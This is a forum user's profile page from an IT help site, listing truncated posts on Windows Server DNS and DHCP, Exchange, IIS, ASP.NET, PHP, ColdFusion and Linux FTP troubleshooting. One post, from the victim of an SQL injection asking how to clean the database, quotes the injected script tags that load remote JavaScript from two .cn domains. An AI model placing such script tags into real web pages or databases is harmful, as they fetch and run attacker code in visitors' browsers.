- Upvotes Received
- 3
- Posts with Upvotes
- 3
- Upvoting Members
- 3
- Downvotes Received
- 0
- Posts with Downvotes
- 0
- Downvoting Members
- 0
309 Posted Topics
Re: I'm going to say that's not possible what you may try is creating a folder with read only rights and hope they aren't smart enought to go into security permissions take ownership of the folder and change the permissions | |
![]() | Re: Go into outlook -> file -> import -> import from another program or file -> personal folder file .pst -> select the .pst for that user from the mobile backup import it to the exchange account hit send receive that will sync the local outlook with the exchange server. Repeat … |
Re: Go into database explorer click connect to database | |
Re: what's the error? in iis you need to right click the website goto properties goto advance make sure is says default 80 leave host header value blank. ip (all unassigned) | |
I can't find a tutorial anywhere on how to search a sql database using a textbox and a button in asp.net any help. I'm coding in C# Sql database has a customers table I want to display firstname and lastname by searching cust_no | |
Re: start -> control panel -> dns -> forward lookup zones -> the zone of your domain right click the white space add host (A) record it will append it to the begining of the domain name but if you are on that domain should still be able to ping webswepper. … | |
My php code to read my xml is there anyway to sort by date or event_id? [CODE]<?php $doc = new DOMDocument(); $doc->load( '../events.xml' ); $date = array(); // initialize data array $books = $doc->getElementsByTagName( "event" ); foreach( $books as $book ) { $evts = $book->getElementsByTagName( "event_id" ); $evt = $evts->item(0)->nodeValue; … | |
Re: Where are you coming up with 421? A /16 subnet is 255.255.0.0. The ip would be 172.18.0.whatever | |
So how can you tell if you've maxed out express and need to move to the full blown version. Not referring to database size but performance? Asking because we are moving a website and the webhost master asked if he will be on express or full version claiming that express … | |
Can anyone get this to work? You can download the code here [url]http://www.mattgifford.co.uk/sexy-fi-login-forms/[/url] but i can't get it to read a success from checklogin.cfm index.cfm [CODE]<!--- Name: index.cfm Author: Matt Gifford aka coldfumonkeh Date: 11/08/2010 Purpose: Login form to demonstrate the use of the jQuery UI's shake effect. ---> <!DOCTYPE … | |
Re: It sounds more like a home networking issue can you describe your home network cable modem dsl modem router etc and model numbers | |
I have a new install of a windows 2008 server with active directory dhcp and dns roles. I have dns settings on the dhcp options set to the servers ip then the isp 2 dns enteries under that. MY workstations periodically drop the dns name of the server i run … | |
This one has me stumped I've installed plenty of windows servers with active directory. I have one client new dell windows 2008 server(active directory, dns, and dhcp server) with xp workstations. I have the server configured at static ip 192.168.10.5. Fios router is at 192.168.10.1. I have the workstations configured … | |
Re: Don't think it's possible you may have to boot from a drive on the motherboard and use the raid array as a data storage only. There also may be certain higher end raid pci cards that do boot. ![]() | |
I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> any idea how to remove it without deleting the descrition? Here is what I have HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script> Here is what I need HIM PORTRAIT SHIRT 3000 items / rows … | |
Re: What is the error message, does the spreadsheet open on any other computers | |
Re: Are you using sata or ide. If you use IDE just link the 2 with the same ribbon cable plug one end into the motherboard then the cable should have 2 more connectors one for each cd/dvd whatever. Make sure slave and primary are turned on in the bios for … | |
Re: Goto the settings for abc.com and set the name servers as ns1.yyy.com and ns2.yyy.com | |
Re: If the program won't run as a service natively, then I would think you need to have an auto login setup | |
Re: Why do you have so many partitions on that disk? Can't you right click an active partition and select extend? | |
I need to create a file to use as a template in coldfusion, so I need to insert cold fusion code to a sql database table using cold fusion or create a file with cffile? Every thing I try to use,it doesn't work because I think it is reading the … | |
Re: Did you install service pack 3 on the xp box? Will the xp machine join the domain? | |
| |
Has anyone ever seen this it's a dell inspiron laptop (sorry don't have the model) my customer upgraded to win 7 and he gets screens that look like this, We've uninstalled and re-installed the video driver 2 or 3 times. The only way to clear it up is to change … | |
Re: Are you using the ip address or dns name? Can you ping it | |
We have this scripting working on one server and are trying to transfer it to a different server and we are getting this error the working server is fedora fc7 the new on is fedora fc12. When we run the script from a command line we get: web root 23:42:09 … | |
Re: Is ftp running try: /etc/init.d/vsftpd start Is iptables blocking port 21 try: /etc/init.d/iptables stop Have you tried connecting with a regular ftp client by default root cannot ftp into vsftp so you have to try anonymous or create a new user. Look in /etc/vsftpd.conf to turn off anonymous access but … | |
Re: You will have to boot to a command prompt via the vista install cd I think choose the repair option run chkdsk at the command prompt and unhide the administrator account then try to login as admin run: net user administrator /active:yes | |
Re: Does disk management show a ntfs partition as healthy? right click the partition and assign it a drive letter | |
Re: What is a rack for hard drives, be more specific ? |
The End.